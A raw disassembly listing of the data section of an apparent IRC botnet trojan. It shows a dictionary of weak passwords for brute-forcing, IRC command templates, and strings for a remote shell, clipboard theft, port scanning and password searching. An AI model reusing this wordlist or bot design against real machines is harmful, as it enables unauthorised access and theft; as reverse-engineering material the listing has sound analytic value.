aZxcv db 'zxcv',0 ; DATA XREF: _2:0042F968�o
align 4
aYxcv db 'yxcv',0 ; DATA XREF: _2:0042F964�o
align 4
aQwer db 'qwer',0 ; DATA XREF: _2:0042F960�o
align 4
aSecret db 'secret',0 ; DATA XREF: _2:0042F95C�o
align 4
aAsdf db 'asdf',0 ; DATA XREF: _2:0042F958�o
align 4
aPc db 'pc',0 ; DATA XREF: _2:0042F954�o
align 10h
aWin db 'win',0 ; DATA XREF: _2:0042F950�o
aTest123 db 'test123',0 ; DATA XREF: _2:0042F94C�o
aAbc db 'abc',0 ; DATA XREF: _2:0042F948�o
aAaa db 'aaa',0 ; DATA XREF: _2:0042F944�o
aA_1: ; DATA XREF: _2:0042F940�o
unicode 0, <a>,0
aCrash db 'crash',0 ; DATA XREF: _2:0042F93C�o
align 10h
aFucked db 'fucked',0 ; DATA XREF: _2:0042F938�o
align 4
aNetfuck db 'netfuck',0 ; DATA XREF: _2:0042F934�o
aIrule db 'irule',0 ; DATA XREF: _2:0042F930�o
align 4
aOwned db 'owned',0 ; DATA XREF: _2:0042F92C�o
align 10h
a0wned db '0wned',0 ; DATA XREF: _2:0042F928�o
align 4
aNetDevil db 'net-devil',0 ; DATA XREF: _2:0042F924�o
align 4
aNetdevil db 'netdevil',0 ; DATA XREF: _2:0042F920�o
align 10h
aDevil db 'devil',0 ; DATA XREF: _2:0042F91C�o
align 4
aNilez db 'Nilez',0 ; DATA XREF: _2:0042F918�o
align 10h
aFoobar db 'foobar',0 ; DATA XREF: _2:0042F914�o
align 4
aGod db 'god',0 ; DATA XREF: _2:0042F910�o
aSex db 'sex',0 ; DATA XREF: _2:0042F90C�o
aPat db 'pat',0 ; DATA XREF: _2:0042F908�o
aPatrick db 'patrick',0 ; DATA XREF: _2:0042F904�o
aAlpha db 'alpha',0 ; DATA XREF: _2:0042F900�o
align 4
a007 db '007',0 ; DATA XREF: _2:0042F8FC�o
a123abc db '123abc',0 ; DATA XREF: _2:0042F8F8�o
align 10h
a1234qwer db '1234qwer',0 ; DATA XREF: _2:0042F8F4�o
align 4
a123123 db '123123',0 ; DATA XREF: _2:0042F8F0�o
align 4
a121212 db '121212',0 ; DATA XREF: _2:0042F8EC�o
align 4
a111111 db '111111',0 ; DATA XREF: _2:0042F8E8�o
align 4
a110 db '110',0 ; DATA XREF: _2:0042F8E4�o
a2600 db '2600',0 ; DATA XREF: _2:0042F8E0�o
align 10h
a2002 db '2002',0 ; DATA XREF: _2:0042F8D8�o
align 4
aXp_0 db 'xp',0 ; DATA XREF: _2:0042F8D4�o
align 4
aEnable db 'enable',0 ; DATA XREF: _2:0042F8D0�o
align 4
aGodblessyou db 'godblessyou',0 ; DATA XREF: _2:0042F8CC�o
aIhavenopass db 'ihavenopass',0 ; DATA XREF: _2:0042F8C8�o
a123asd db '123asd',0 ; DATA XREF: _2:0042F8C4�o
align 4
aSuper db 'super',0 ; DATA XREF: _2:0042F8C0�o
align 4
aInternet db 'Internet',0 ; DATA XREF: _2:0042F8BC�o
align 4
a123qwe db '123qwe',0 ; DATA XREF: _2:0042F8B4�o
align 10h
aSybase db 'sybase',0 ; DATA XREF: _2:0042F8B0�o
align 4
aAbc123 db 'abc123',0 ; DATA XREF: _2:0042F8A8�o
align 10h
aAbcd db 'abcd',0 ; DATA XREF: _2:0042F8A4�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: _2:0042F89C�o
align 10h
aPass_0 db 'pass',0 ; DATA XREF: _2:0042F898�o
align 4
a88888888 db '88888888',0 ; DATA XREF: _2:0042F894�o
align 4
a11111111 db '11111111',0 ; DATA XREF: _2:0042F890�o
align 10h
a111 db '111',0 ; DATA XREF: _2:0042F88C�o
a54321 db '54321',0 ; DATA XREF: _2:0042F888�o
align 4
a654321 db '654321',0 ; DATA XREF: _2:0042F884�o
align 4
a123456789 db '123456789',0 ; DATA XREF: _2:0042F880�o
align 10h
a12345678 db '12345678',0 ; DATA XREF: _2:0042F87C�o
align 4
a1234567 db '1234567',0 ; DATA XREF: _2:0042F878�o
a123456 db '123456',0 ; DATA XREF: _2:0042F874�o
align 4
a12345 db '12345',0 ; DATA XREF: _2:0042F870�o
align 4
a1234 db '1234',0 ; DATA XREF: _2:0042F86C�o
align 4
a123 db '123',0 ; DATA XREF: _2:0042F868�o
a12 db '12',0 ; DATA XREF: _2:0042F864�o
align 4
a1: ; DATA XREF: _2:0042F860�o
unicode 0, <1>,0
aTemp123 db 'temp123',0 ; DATA XREF: _2:0042F85C�o
aChangeme_0 db 'Changeme',0 ; DATA XREF: _2:0042F858�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: _2:0042F854�o
align 4
aLinux db 'linux',0 ; DATA XREF: _2:0042F850�o
align 10h
aUnix db 'unix',0 ; DATA XREF: _2:0042F84C�o
align 4
aLocal db 'LOCAL',0 ; DATA XREF: _2:0042F848�o
align 10h
aPepsi db 'pepsi',0 ; DATA XREF: _2:0042F844�o
align 4
aServer_0 db 'SERVER',0 ; DATA XREF: _2:0042F840�o
align 10h
aSystem db 'SYSTEM',0 ; DATA XREF: _2:0042F83C�o
align 4
aBackup db 'BACKUP',0 ; DATA XREF: _2:0042F838�o
align 10h
aAccess db 'ACCESS',0 ; DATA XREF: _2:0042F830�o
align 4
aTest db 'TEST',0 ; DATA XREF: _2:0042F82C�o
align 10h
aEdu db 'edu',0 ; DATA XREF: _2:0042F828�o
aOwner_1 db 'Owner',0 ; DATA XREF: _2:0042F824�o
align 4
aOwner_0 db 'OWNER',0 ; DATA XREF: _2:0042F820�o
align 4
aDemo db 'DEMO',0 ; DATA XREF: _2:0042F81C�o
align 4
aFiles db 'FILES',0 ; DATA XREF: _2:0042F818�o
align 4
aRead db 'READ',0 ; DATA XREF: _2:0042F814�o
align 4
aBoth db 'BOTH',0 ; DATA XREF: _2:0042F810�o
align 4
aLadeda db 'ladeda',0 ; DATA XREF: _2:0042F80C�o
align 4
aFull_0 db 'FULL',0 ; DATA XREF: _2:0042F808�o
align 4
aWrite db 'WRITE',0 ; DATA XREF: _2:0042F804�o
align 4
aShare_0 db 'SHARE',0 ; DATA XREF: _2:0042F800�o
align 4
aTemp db 'TEMP',0 ; DATA XREF: _2:0042F7FC�o
align 4
aPassword db 'PASSWORD',0 ; DATA XREF: _2:0042F7F8�o
align 4
aAdmin_0 db 'ADMIN',0 ; DATA XREF: _2:0042F7F4�o
align 10h
aRoot_0 db 'ROOT',0 ; DATA XREF: _2:0042F7EC�o
align 4
aGuest_1 db 'GUEST',0 ; DATA XREF: _2:0042F7E8�o
align 10h
aBla db 'bla',0 ; DATA XREF: _2:0042F7E4�o
aFubar db 'fubar',0 ; DATA XREF: _2:0042F7E0�o
align 4
aAdministrato_1 db 'ADMINISTRATOR',0 ; DATA XREF: _2:0042F7D4�o
align 4
aDb2 db 'db2',0 ; DATA XREF: _2:0042F7C4�o
aOracle db 'oracle',0 ; DATA XREF: _2:0042F7C0�o _2:0042F8AC�o
align 4
aDba db 'dba',0 ; DATA XREF: _2:0042F7BC�o
aDatabase db 'database',0 ; DATA XREF: _2:0042F7B8�o _2:0042F8A0�o
align 4
aDefault db 'default',0 ; DATA XREF: _2:0042F7B4�o _2:0042FF40�o
aGuest_0 db 'guest',0 ; DATA XREF: _2:0042F7B0�o
align 4
aWwwadmin db 'wwwadmin',0 ; DATA XREF: _2:0042F7AC�o
align 4
aTeacher db 'teacher',0 ; DATA XREF: _2:0042F7A8�o _2:00430ED4�o
aStudent db 'student',0 ; DATA XREF: _2:0042F7A4�o _2:00430E1C�o
aOwner db 'owner',0 ; DATA XREF: _2:0042F7A0�o
align 4
aComputer db 'computer',0 ; DATA XREF: _2:0042F79C�o _2:0042F8B8�o
align 4
aRoot db 'root',0 ; DATA XREF: _2:0042F798�o _2:0042F7F0�o
align 10h
aStaff db 'staff',0 ; DATA XREF: _2:0042F794�o
align 4
aAdmin db 'admin',0 ; DATA XREF: _2:0042F790�o
align 10h
aAdmins db 'admins',0 ; DATA XREF: _2:0042F78C�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: _2:0042F788�o
aAdministrateur db 'administrateur',0 ; DATA XREF: _2:0042F784�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: _2:0042F780�o
align 4
aAdministrato_0 db 'administrator',0 ; DATA XREF: _2:0042F77C�o _2:0042F7DC�o
align 4
aH4ckerTool db 'h4cker tool',0 ; DATA XREF: _2:off_42F6CC�o
a@admin_com db '*@admin.com',0 ; DATA XREF: _2:off_42F6C8�o
dword_43511C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40E6A9+352�o
dd 2BBBB02h, 6F422020h, 74732074h, 65747261h, 2E64h
dword_435144 dd 25207325h, 25222064h, 2273h ; DATA XREF: sub_40E6A9+280�o
dword_435150 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EB92+F2�o
dd 2BBBB02h
aConnectedToS_ db ' Connected to %s.',0
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_40ECFA+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_40ECFA+35�o
align 4
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+627A�o
align 4
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+6262�o
align 4
dword_4351C4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+6255�o
dd 2BBBB02h
aUserSLoggedIn_ db ' User: %s logged in.',0
align 4
dword_4351F4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+6238�o
dd 2BBBB02h
aAbosal7Accepte db ' ABOSAL7 accepted.',0
dword_435220 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+61D7�o
dd 2BBBB02h, 462A2020h, 656C6961h, 6F682064h, 61207473h
db 75h
aThBySS_ db 'th by: (%s!%s).',0 ; DATA XREF: _2:off_4274DC�o
align 4
dword_43525C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+6170�o
dd 2BBBB02h
aFailedPassAuth db ' *Failed pass auth by: (%s!%s).',0
align 4
aNoticeSYouVeBe db 'NOTICE %s :You',27h,'ve been logged.',0Dh,0Ah,0
; DATA XREF: sub_40EE72+615E�o
; sub_40EE72+61C5�o
align 4
aNoticeSNiceTry db 'NOTICE %s :Nice try, idiot. (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_40EE72+6147�o
; sub_40EE72+61AE�o
align 4
asc_4352E4: ; DATA XREF: sub_40EE72+6117�o
unicode 0, <~>,0
dword_4352E8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+60C7�o
dd 2BBBB02h
aRandomNickChan db ' Random nick change: %s',0
align 4
dword_43531C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+6013�o
dd 2BBBB02h
aInvalidLoginSl db ' Invalid login slot number: %d.',0
align 4
dword_435358 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+6008�o
dd 2BBBB02h
aNoUserLoggedIn db ' No user logged in at slot: %d.',0
align 4
dword_435394 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5FB3�o
dd 2BBBB02h, 73252020h, 0
unk_4353B4 db 2 ; DATA XREF: sub_40EE72+5F89�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToStar_6 db ' Failed to start secure thread, error: <%d>.',0
align 10h
dword_435400 dd 7A026E02h, 201F6D1Fh, 63657328h, 2E657275h, 1F6C1F70h
; DATA XREF: sub_40EE72+5F13�o
dd 2202967h, 2002BBBBh, 20732520h, 74737973h, 2E6D65h
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_40EE72+5F0D�o
align 4
aSecuring db 'Securing',0 ; DATA XREF: sub_40EE72+5F06�o
align 10h
aSec db 'sec',0 ; DATA XREF: sub_40EE72+5EAB�o
aSecure db 'secure',0 ; DATA XREF: sub_40EE72+5E9A�o
align 4
unk_43544C db 2 ; DATA XREF: sub_40EE72+5E8F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToStar_7 db 'Failed to start server thread, error: <%d>.',0
dword_435494 dd 69026602h, 6966646Eh, 1F651F6Ch, 2E2Eh ; DATA XREF: sub_40EE72+5D6D�o
dword_4354A4 dd 646E6946h, 6C696620h, 65h ; DATA XREF: sub_40EE72+5D68�o
dword_4354B0 dd 72027002h, 1F631F6Fh, 2E2Eh ; DATA XREF: sub_40EE72+5D55�o
dword_4354BC dd 636F7250h, 20737365h, 7473696Ch, 0 ; DATA XREF: sub_40EE72+5D50�o
dword_4354CC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5D1D�o
dd 2BBBB02h, 65522020h, 6E6E6F63h, 69746365h, 2E676Eh
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40EE72:loc_414B82�o
align 4
dword_43550C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5CFB�o
dd 2BBBB02h, 69442020h, 6E6F6373h, 7463656Eh, 2E676E69h
dd 0
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40EE72:loc_414B60�o
align 10h
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+5CC6�o
align 4
dword_43555C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5C74�o
dd 2BBBB02h
aStatusReady_Bo db ' Status: Ready. Bot Uptime: %s.',0
align 4
dword_435598 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5C60�o
dd 2BBBB02h, 6F422020h, 44492074h, 7325203Ah, 2Eh
dword_4355C0 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40EE72+5C3B�o
dd 2029671Fh, 2BBBB02h
aFailedToStartL db ' Failed to start list thread, error: <%d>.',0
dword_435608 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40EE72+5BD0�o
dd 2029671Fh, 2BBBB02h, 694C2020h, 74207473h, 61657268h
dd 2E7364h
dword_435634 dd 627573h ; DATA XREF: sub_40EE72+5BAA�o
dword_435638 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5B5B�o
dd 2BBBB02h, 6C412020h, 20736169h, 7473696Ch, 2Eh
dword_435660 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5B40�o
dd 2BBBB02h
aFailedToStar_8 db ' Failed to start listing thread, error: <%d>.',0
align 4
dword_4356A8 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5AD1�o
dd 2BBBB02h, 694C2020h, 6E697473h, 6F6C2067h, 2E67h
dword_4356D0 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5A34�o
dd 2BBBB02h, 654E2020h, 726F7774h, 6E49206Bh, 2E6F66h
dword_4356F8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5A02�o
dd 2BBBB02h, 79532020h, 6D657473h, 666E4920h, 2E6Fh
dword_435720 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+59AD�o
dd 2BBBB02h, 65522020h, 69766F6Dh, 4220676Eh, 2E746Fh
unk_435748 db 2 ; DATA XREF: sub_40EE72+599A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToStar_9 db 'Failed to start listing thread, error: <%d>.',0
align 4
dword_435798 dd 7A026E02h, 201F6D1Fh, 6F727028h, 73736563h, 702E7365h
; DATA XREF: sub_40EE72+592B�o
dd 671F6C1Fh, 0BB022029h, 202002BBh, 636F7250h, 73736563h
dd 73696C20h, 2E74h
aFull db 'full',0 ; DATA XREF: sub_40EE72+590B�o
align 10h
unk_4357D0 db 2 ; DATA XREF: sub_40EE72+58B4�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aAlreadyRunning db 'Already running.',0
align 4
unk_435804 db 2 ; DATA XREF: sub_40EE72+5891�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 64h, 6Bh
db 65h ; e
db 79h, 73h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aSearchComplete db ' Search completed.',0
align 4
dword_435834 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5848�o
dd 2BBBB02h, 70552020h, 656D6974h, 7325203Ah, 2Eh
dword_43585C dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_4145F7�o
dd 2BBBB02h
aRemoteShellRea db ' Remote shell ready.',0
align 4
dword_43588C dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+577E�o
dd 2BBBB02h
aCouldnTOpenRem db ' Couldn',27h,'t open remote shell.',0
align 4
dword_4358C4 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5762�o
dd 2BBBB02h
aRemoteShellAlr db ' Remote shell already running.',0
dword_4358FC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5744�o
dd 2BBBB02h, 65472020h, 6C432074h, 6F627069h, 2E647261h
dd 0
aClipboardData db '-[Clipboard Data]-',0 ; DATA XREF: sub_40EE72+5716�o
align 4
unk_43593C db 2 ; DATA XREF: sub_40EE72:loc_414578�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToFlushA db ' Failed to flush ARP cache.',0
align 4
unk_435978 db 2 ; DATA XREF: sub_40EE72+56EB�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aArpCacheFlushe db ' ARP cache flushed.',0
align 4
unk_4359AC db 2 ; DATA XREF: sub_40EE72:loc_41454D�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToLoadDn db ' Failed to load dnsapi.dll.',0
align 4
unk_4359E8 db 2 ; DATA XREF: sub_40EE72:loc_414546�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToFlushD db ' Failed to flush DNS cache.',0
align 4
unk_435A24 db 2 ; DATA XREF: sub_40EE72+56CD�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDnsCacheFlushe db ' DNS cache flushed.',0
align 4
dword_435A58 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_40EE72+565D�o
dd 2029671Fh, 2BBBB02h
aFailedToSta_10 db ' Failed to start server thread, error: <%d>.',0
align 4
dword_435AA4 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_40EE72+55F2�o
dd 2029671Fh, 2BBBB02h
aServerListen_0 db ' Server listening on IP: %s:%d, Username: %s.',0
align 10h
unk_435AF0 db 2 ; DATA XREF: sub_40EE72+5526�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToSta_11 db 'Failed to start server thread, error: <%d>.',0
unk_435B38 db 2 ; DATA XREF: sub_40EE72+53B0�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_12 db ' Failed to start server thread, error: <%d>.',0
align 10h
unk_435B80 db 2 ; DATA XREF: sub_40EE72+5285�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aAlreadyRunni_0 db ' Already running.',0
unk_435BAC db 2 ; DATA XREF: sub_40EE72+526F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_13 db ' Failed to start search thread, error: <%d>.',0
unk_435BF8 db 2 ; DATA XREF: sub_40EE72+51FE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSearchingForPa db ' Searching for password.',0
unk_435C30 db 2 ; DATA XREF: sub_40EE72:loc_414037�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_14 db ' Failed to start scan, port is invalid.',0
align 4
unk_435C74 db 2 ; DATA XREF: sub_40EE72+5106�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSPortScanStart db ' %s Port Scan started on %s:%d with a delay of %d seconds for %d'
db ' minutes using %d threads.',0
align 4
dword_435CEC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4EC6�o
dd 2BBBB02h
aNickChangedToS db ' Nick changed to: ',27h,'%s',27h,'.',0
align 10h
dword_435D20 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4EAA�o
dd 2BBBB02h
aJoinedChannelS db ' Joined channel: ',27h,'%s',27h,'.',0
dword_435D50 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4E87�o
dd 2BBBB02h
aPartedChannelS db ' Parted channel: ',27h,'%s',27h,'.',0
dword_435D80 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4E6B�o
dd 2BBBB02h, 52492020h, 61522043h, 25203A77h, 2E73h
dword_435DA8 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_413C5C�o
dd 2029671Fh, 2BBBB02h
aFailedToKillTh db ' Failed to kill thread: %s.',0
align 4
dword_435DE4 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40EE72+4DE3�o
dd 2029671Fh, 2BBBB02h
aKilledThreadS_ db ' Killed thread: %s.',0
align 4
dword_435E18 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_413C0F�o
dd 2029671Fh, 2BBBB02h
aNoActiveThread db ' No active threads found.',0
align 10h
dword_435E50 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40EE72+4D84�o
dd 2029671Fh, 2BBBB02h
aStoppedDThread db ' Stopped: %d thread(s).',0
align 4
aAll db 'all',0 ; DATA XREF: sub_40EE72+4D6A�o
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+4CE3�o
; sub_40EE72:loc_414B4A�o
align 4
dword_435E9C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4C68�o
dd 2BBBB02h
aPrefixChangedT db ' Prefix changed to: ',27h,'%c',27h,'.',0
align 10h
unk_435ED0 db 3 ; DATA XREF: sub_40EE72:loc_413AC5�o
db 31h, 35h, 2Ch
db 31h ; 1
db 34h, 6Eh, 7Ah
db 6Dh ; m
db 20h, 3, 32h
db 2Eh ; .
db 2Eh, 20h, 3
db 31h ; 1
db 35h, 28h, 73h
db 68h ; h
db 65h, 2 dup(6Ch)
db 3
db 32h, 2Eh, 3
db 31h ; 1
db 35h, 6Dh, 6Fh
db 64h ; d
db 29h, 20h, 3
db 32h ; 2
db 0BBh, 3, 31h
a5CouldnTOpenFi db '5 Couldn',27h,'t open file: %s',0
align 4
unk_435F14 db 3 ; DATA XREF: sub_40EE72+4C49�o
db 31h, 35h, 2Ch
db 31h ; 1
db 34h, 6Eh, 7Ah
db 6Dh ; m
db 20h, 3, 32h
db 2Eh ; .
db 2Eh, 20h, 3
db 31h ; 1
db 35h, 28h, 73h
db 68h ; h
db 65h, 2 dup(6Ch)
db 3
db 32h, 2Eh, 3
db 31h ; 1
db 35h, 6Dh, 6Fh
db 64h ; d
db 29h, 20h, 3
db 32h ; 2
db 0BBh, 3, 31h
a5FileOpenedS db '5 File opened: %s',0
align 10h
dword_435F50 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4C29�o
dd 2BBBB02h
aServerChangedT db ' Server changed to: ',27h,'%s',27h,'.',0
align 4
dword_435F84 dd 7A026E02h, 201F6D1Fh, 736E6428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_413A4F�o
dd 2BBBB02h
aCouldnTResol_0 db ' Couldn',27h,'t resolve hostname.',0
align 4
dword_435FBC dd 7A026E02h, 201F6D1Fh, 736E6428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4BB2�o
dd 2BBBB02h
